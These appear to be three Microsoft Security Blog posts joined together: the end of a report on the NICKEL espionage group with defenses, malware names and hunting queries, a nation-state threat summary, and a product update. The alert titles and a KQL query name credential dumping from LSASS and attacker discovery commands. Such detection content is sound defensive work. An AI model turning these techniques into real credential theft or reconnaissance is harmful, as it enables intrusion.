Here are recent examples of NICKEL’s routine data collection:

After collecting the data in a central directory, the attackers then used either a renamed rar.exe or 7z.exe to archive the files. NICKEL also frequently used keyboard walks as a password for their archived data collections. The following are examples of RAR archiving for exfiltration:

Here is an example of 7zip archiving for exfiltration:

Microsoft will continue to monitor NICKEL activity and implement product protections for our customers. The IOCs, current detections, and advanced protections in place across our security products are detailed below.

Recommended defenses

The following guidance can help mitigate the techniques and threat activity described in this blog:

• Block legacy authentication protocols in Azure Active Directory – especially Exchange Web Services (EWS)
• Enable multi-factor authentication to mitigate compromised credentials.
  • For Office 365 users, see multi-factor authentication support.
  • For Consumer and Personal email accounts, see how to use two-step verification.
• Use passwordless solutions like Microsoft Authenticator to secure accounts.
• Review and enforce recommended Exchange Online access policies.
  • Block ActiveSync clients from bypassing Conditional Access policies.
• Block all incoming traffic from anonymizing services, where possible.
• Turn on the following attack surface reduction rule to block or audit activity associated with this threat:
  • Block credential stealing from the Windows local security authority subsystem (lsass.exe)

Indicators of compromise (IOCs)

Detections

Microsoft 365 Defender

Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

• Backdoor:Win32/Leeson
• Trojan:Win32/Kechang
• Backdoor:Win32/Nightimp!dha
• Trojan:Win32/Rokum
• TrojanSpy:Win32/KeyLogger

Endpoint detection and response (EDR)

Alerts with the following titles in the security center can indicate NICKEL threat activity on your network:

• NICKEL activity group
• Malware associated with NICKEL activity group
• Communication with NICKEL infrastructure

The following alerts may also indicate threat activity associated with NICKEL but may also be triggered by unrelated threat activity:

• Mimikatz credential theft tool
• Suspected credential theft activity
• Malicious credential theft tool execution detected
• Sensitive credential memory read
• Password hashes dumped from LSASS memory
• Suspicious credential dump from NTDS.dit
• Compression of sensitive data
• Staging of sensitive data
• Suspicious process transferring data to external network
• Possible data exfiltration through multiple egress points

Microsoft 365 Defender correlates related alerts into consolidated incidents to help customers determine with confidence if observed alerts are related to this activity. We also published a threat analytics report on the NICKEL activity described in this blog. Microsoft 365 Defender can use the threat analytics report to get technical information, as well as view, investigate, and respond to incidents and alerts that include any detections of related NICKEL activity.

Advanced hunting queries

Microsoft Sentinel

The indicators of compromise (IoCs) included in this blog post can be used by Microsoft Sentinel customers for detection purposes using the queries detailed below.

Match known NICKEL domains and hashes

The following query matches domain name, hash IOCs and Microsoft 365 Defender signatures related to the NICKEL activity group with CommonSecurityLog, DnsEvents, VMConnection and SecurityEvents dataTypes.

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/NICKELIOCsNov2021.yaml

Identify NICKEL registry modifications patterns

The following query identifies instances where NICKEL malware intentionally configures the browser settings for its use by modifying registry entries.

https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/NickelRegIOCPatterns.yaml

Hunt for NICKEL Command Line Activity November 2021

The below query looks for process command line activity related to data collection and staging observed being used by NICKEL. It hunts for use of tools such as xcopy and renamed archiving tools used for data collection and staging on the hosts with signatures observed in NICKEL activity.

https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/NICKELCommandLineActivity-Nov2021.yaml

Microsoft 365 Defender

Surface WDigest authentication changes

Use this query to look for alerts related to enabling WDigest Authentication, which allows attackers to dump credentials in clear text. Run query

AlertInfo
| where Title == "WDigest configuration change"
| join AlertEvidence on AlertId

Surface discovery activity

Use this query to surface potential NICKEL discovery activity. Run query

DeviceProcessEvents
| where InitiatingProcessFileName =~ "rundll32.exe" and InitiatingProcessCommandLine has ",start"
| where ProcessCommandLine has_any("cmd",
"netstat", "tasklist", "dir", "del", "net use", "ipconfig", "systeminfo", "xcopy", "mkdir", ".bat")

The post NICKEL targeting government organizations across Latin America and Europe appeared first on Microsoft Security Blog.

The aims of nation-state cyber actors—largely espionage and disruption—remain consistent, along with their most reliable tactics and techniques: credential harvesting, malware, and VPN exploits. However, a common theme this year among the actors originating from China, Russia, North Korea, and Iran has been increased targeting of IT service providers as a way of exploiting downstream customers.¹

Earlier this month, we published the 2021 Microsoft Digital Defense Report (MDDR), which provides more in-depth findings about Microsoft’s tracking of nation-state threat groups, including information on the most heavily targeted sectors and countries, specific threat actors, attack methods, and more. This blog captures the high-level themes from the MDDR, and we encourage you to download the full report for additional details.

Government agencies and non-governmental organizations are favored targets

Whenever an organization or individual account holder is targeted or compromised by observed nation-state activities, Microsoft delivers a nation-state notification (NSN) directly to that customer to give them the information they need to investigate the activity. Over the past three years, we’ve delivered over 20,500 NSNs. According to the analysis of the actor activity behind these NSNs, nation-state attacks in the past year have largely focused on operational objectives of espionage and intelligence collection rather than destructive attacks.

“Nation-state activity spans nearly every industry sector and geographic region. In other words, protections against these tactics are critical for every organization and individual.”—2021 Microsoft Digital Defense Report.

The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Digital Crimes Unit (DCU) have observed that nearly 80 percent of nation-state attacks were directed against government agencies, think tanks, and non-government organizations (NGOs). The nation-state groups we refer to as NOBELIUM, NICKEL, THALLIUM, and PHOSPHORUS were the most active against the government sector, targeting mostly government entities involved in international affairs.

Figure 1: Sectors targeted by nation-state attacks (July 2020 to June 2021).

Russia-based cyber attackers in particular have increasingly set their sights on government targets. Year-on-year comparisons of NSN data depict a marked increase in successful compromises, from a 21 percent success rate between July 2019 and June 2020, up to 32 percent since July 2020. In turn, the percentage of government organizations targeted by Russian threat actors exploded from roughly 3 percent last year, to 53 percent since July 2020 (see figure 3).

Most-targeted countries

The United States remained the most highly targeted country in the past year. Russia-based NOBELIUM also heavily targeted Ukraine, particularly focusing on government interests involved in rallying against a build-up of Russian troops along Ukraine’s border—driving the number of Ukrainian customers impacted from 6 last year to more than 1,200 this year. This past year also saw a near quadrupling in the targeting of Israeli entities, driven exclusively by Iranian actors as tensions escalated between the two countries.

Figure 2: Countries most targeted (July 2020 to June 2021).

Microsoft identifies nation-state activities by chemical element names, some of which are shown in the table below, along with their countries of origin. This small sample of the total nation-state actors tracked by Microsoft represents several of the most active in the last year.

Figure 3: Reference map for nation-state actors.

Volume versus precision

Rates of successful compromises varied widely among threat groups this year. Some, such as North Korea-based THALLIUM, had a low rate of successful compromise likely because their common tactic of large-scale spear-phishing campaigns has become easier to detect and deter as users become increasingly aware of these lures and organizations use security solutions to detect them more effectively. Russia-based NOBELIUM, in contrast, had more successful compromises as a result of their more targeted attack against software supply chains coupled with more high-volume password spray campaigns in pursuit of credential theft. Nation-state actors appear to be increasing the scale of these blunt attacks in an attempt to evade detection and improve their chances of a successful breach. The first fiscal quarter of 2020 (July to September) saw a proportionally higher compromise rate; not necessarily because threat actors were more successful, but because we saw fewer high-volume campaigns during this time.

Figure 4: Average rates of compromise (all tactics, July 2020 to June 2021).

Snapshot: Nation-state activity

Russia

Russia-based NOBELIUM proved how insidious software supply chain attacks can be with its devastating compromise of the SolarWinds Orion software update.² Although the group limited its follow-up exploitation to approximately 100 organizations, its backdoor malware was pushed to roughly 18,000 entities worldwide. In other incidents, NOBELIUM has employed password spray and phishing attacks to compromise third-party providers and facilitate future compromises. This threat actor targeted cloud solution providers (CSPs) and leveraged the backdoor to steal a Mimecast private key.³ Get the full account from world-class defenders on what it took to respond to the most advanced nation-state attack in history by watching the Decoding NOBELIUM docuseries.

China

Chinese nation-state threat actors have been targeting the United States political landscape for insight into policy shifts. In early March 2021, Microsoft blogged about HAFNIUM and the detection of multiple zero-day exploits used to attack on-premises versions of Microsoft Exchange Server. HAFNIUM operates primarily from leased virtual private servers in the United States and targets entities across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.

Iran

Iran continued its streak of destructive cyberattacks against regional adversaries, including a string of ransomware attacks against Israeli entities. Iran-linked threat actor RUBIDIUM has been implicated in the Pay2Key⁴ and N3tw0rm⁵ ransomware campaigns that targeted Israel in late 2020 and early 2021. A common element in Iranian nation-state cyberattacks was the targeting of Israeli logistics companies involved in maritime transportation. Despite Tehran’s less aggressive approach toward the United States in the wake of last year’s election, United States entities remained Iranian threat actors’ top target, comprising nearly half of the NSNs Microsoft delivered to cloud-service customers.

North Korea

Just over half the NSNs Microsoft issued were for North Korea-based state actors during the last three months of 2020. The majority of the North Korean targeting was directed at consumer account targets, based on the likelihood of obtaining non-publicly available diplomatic or geopolitical intelligence. As Microsoft reported in November 2020,  ZINC and CERIUM targeted pharmaceutical companies and vaccine researchers in several countries, probably to speed up North Korea’s own vaccine research. North Korea also continued to target financial companies with the intent of stealing cryptocurrency and intellectual property.⁶

Private sector actors supply the tools

Though not nation-state actors themselves, private sector offensive actors (PSOAs) create and sell malicious cyber technologies to nation-state buyers. PSOA tools have been observed targeting dissidents, human rights defenders, journalists, and other private citizens. In December 2020, Microsoft’s efforts to protect our customers led us to file an amicus brief in support of WhatsApp’s case against Israel-based NSO Group Technologies.⁷ The brief asks the court to reject NSO Group’s position that it’s not responsible for the use of its surveillance and espionage products by governments. Microsoft also worked with Citizen Lab to disable malware used by Israel-based PSOA, SOURGUM (aka Candiru), which created malware and zero-day exploits (fixed in CVE-2021-31979 and CVE-2021-33771) as a part of a hacking-as-a-service package sold to government agencies and other malicious actors.

Comprehensive protection starts with individuals

One thing is clear: nation-state actors are well-funded and employ techniques of tremendous breadth and sophistication. More than other adversaries, nation-state attackers will also target individuals specifically for access to their connections, communications, and information. These attackers are constantly refining their tactics and techniques; therefore, defense-in-depth strategies should include educating employees on how to avoid being targeted themselves. Most importantly, applying Zero Trust principles across corporate resources helps secure today’s mobile workforce—protecting people, devices, applications, and data no matter their location or the scale of threats faced.

Learn more

For a deep dive into our latest information on nation-state threats, download the 2021 Microsoft Digital Defense Report and watch the Decoding NOBELIUM docuseries. Also, look for more blog posts providing information for each themed week of Cybersecurity Awareness Month 2021. Read our latest posts:

• #BeCyberSmart: When we learn together, we’re more secure together
• How cyberattacks are changing according to new Microsoft Digital Defense Report
• Get career advice from 7 inspiring leaders in cybersecurity
• Defenders wanted—building the new cybersecurity professionals

Be sure to visit our Cybersecurity Awareness Month page for links to additional resources and information on protecting your organization year-round. Do your part. #BeCyberSmart

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

¹Awareness Briefing: Chinese Cyber Activity Targeting Managed Service Providers, Cybersecurity Infrastructure Security Agency.

²A ‘Worst Nightmare’ Cyberattack: The Untold Story Of The SolarWinds Hack, Monika Estatieva, NPR. 16 April 2021.

³Mimecast attributes supply chain attack to SolarWinds’ hackers, David Jones, Cybersecurity Dive. 14 January 2021.

⁴Pay2Key Ransomware Joins the Threat Landscape, Tomas Meskauskas, Security Boulevard. 30 November 2020.

⁵N3TW0RM ransomware emerges in wave of cyberattacks in Israel, Lawrence Abrams, Bleeping Computer. 2 May 2021.

⁶North Korean hackers charged in massive cryptocurrency theft scheme, Dan Mangan, CNBC. 17 February 2021.

⁷Google, Cisco and VMware join Microsoft to oppose NSO Group in WhatsApp spyware case, Zack Whittaker, Tech Crunch. 21 December 2020.

The post Microsoft Digital Defense Report shares new insights on nation-state attacks appeared first on Microsoft Security Blog.

Enhancing identity protection

Currently, 81 percent of all cyberattacks are due to weak or compromised credentials. Weak identity protection exposes all other attack surfaces to cyberthreats. With this in mind, Microsoft has invested heavily in identity protection—ensuring it continues as one of our fundamental strengths and differentiators. Microsoft Threat Protection leverages Azure Active Directory (Azure AD) Identity Protection, to provide comprehensive, industry leading identity protection for hundreds of millions of users. This month, we’re excited to announce enhancements to our identity protection capabilities with the following updates to Azure AD Identity Protection:

• An intuitive and integrated UX for Azure AD Identity Protection including security insights, recommendations, sign-ins report integration, and the ability to filter, sort, and perform bulk operations (Figure 1).
• Powerful APIs that allow you to integrate all levels of risk data with ticketing or SIEM systems.
• Improved risk assessment based on continuously tuning our heuristic and machine learning systems to bring you even more accurate risk analysis to drive your prevention and remediation strategy.
• Service-wide alignment across risky users and risky sign-ins.

Figure 1. The new Azure AD Identity Protection Security – Overview dashboard.

Each of these updates is based on customer feedback and our deep domain expertise. With these updates, we continue to improve and build on securing identities for thousands of customers. In fact, several customers such as The Walsh Group, Abtis, Identity Experts, and BDO Netherlands have already experienced the benefits of these new enhancements. We hope you try the refreshed Azure AD Identity Protection. Get the full details of these updates in our blog post and please share your thoughts via the in-product prompts.

Reducing complexity with the Microsoft 365 security center

Microsoft Threat Protection is built on the Microsoft Intelligent Security Graph, which provides a deep and broad threat signal and leverages machine learning for intelligent signal correlation. Many of our customers have often asked us to provide a “single pane of glass” that provides a centralized experience across their Microsoft security services and helps correlate signals from disparate sources, to provide richer insights that lead to intelligent security decisions.

To address this critical customer ask, we recently launched the Microsoft 365 security center (Figure 2), which helps surface much of these correlated signals in a detailed and elegant user interface, helping reduce the complexity of an organization’s security environment. The new Microsoft 365 security center (which can be accessed at security.microsoft.com) provides security administrators (SecAdmins) a centralized hub and specialized workspace to manage and take full advantage of most Microsoft Threat Protection services. Admins will gain the visibility, control, and guidance necessary to understand and act on the threats currently impacting their organization, as well as information on past and future threats.

Figure 2. The new Microsoft 365 security center (security.microsoft.com).

The Microsoft 365 security center also provides experiences for security operators (SecOps) through the integration of incident response capabilities such as a centralized alert view and powerful hunting capabilities enabling ad-hoc investigations. We’ll be making continuous enhancements to the Microsoft 365 security center and providing updates on its progress.

Microsoft Threat Protection secures think tanks, non-profits, and the public sector from unidentified attackers

While our updates on new features and enhancements hopefully convey our focus and investment in providing best-in-class security, Microsoft Threat Protection’s ability to stop real-world threats is ultimately the truest test. Recently, Microsoft Threat Protection helped secure several public sector institutions and non-governmental organizations like think tanks, research centers, educational institutions, private-sector corporations in the oil and gas, chemical, and hospitality industries from a very aggressive cyberattack. Some third-party security researchers have attributed the attack to CozyBear, though Microsoft does not believe there is yet enough evidence to attribute the attack to CozyBear. Figure 3 shows the full attack chain.

Figure 3. Attack chain of recent threat to public sector and other non-government agencies by unidentified attacker.

Customers using the complete Microsoft Threat Protection solution were secured from the attack. Behavior-based protections in multiple Microsoft Threat Protection components blocked malicious activities and exposed the attack at its early stages. Office 365 Advanced Threat Protection detected emails with malicious URLs, blocking them, including samples which had never been seen before. Meanwhile, numerous alerts in Windows Defender Advanced Threat Protection (ATP) exposed the attacker techniques across the attack chain.

Due to the nature of the victims, and because the campaign features characteristics of previously observed nation-state attacks, Microsoft took the added step of notifying thousands of individual recipients in hundreds of targeted organizations. As part of the Defending Democracy Program, Microsoft encourages eligible organizations to participate in Microsoft AccountGuard, a service designed to help these highly targeted customers protect themselves from cybersecurity threats. Learn about the full analysis in our recent blog.

Experience the evolution of Microsoft Threat Protection

Take a moment to learn more about Microsoft Threat Protection, read our previous monthly updates, and visit Integrated and automated security. Organizations have already transitioned to Microsoft Threat Protection and partners are leveraging its powerful capabilities.

Begin trials of the Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

• Windows Defender ATP trial
• Office 365 E5 trial
• Enterprise Mobility + Security (EMS) E5 trial
• Azure Security Center trial

The post The evolution of Microsoft Threat Protection, February update appeared first on Microsoft Security Blog.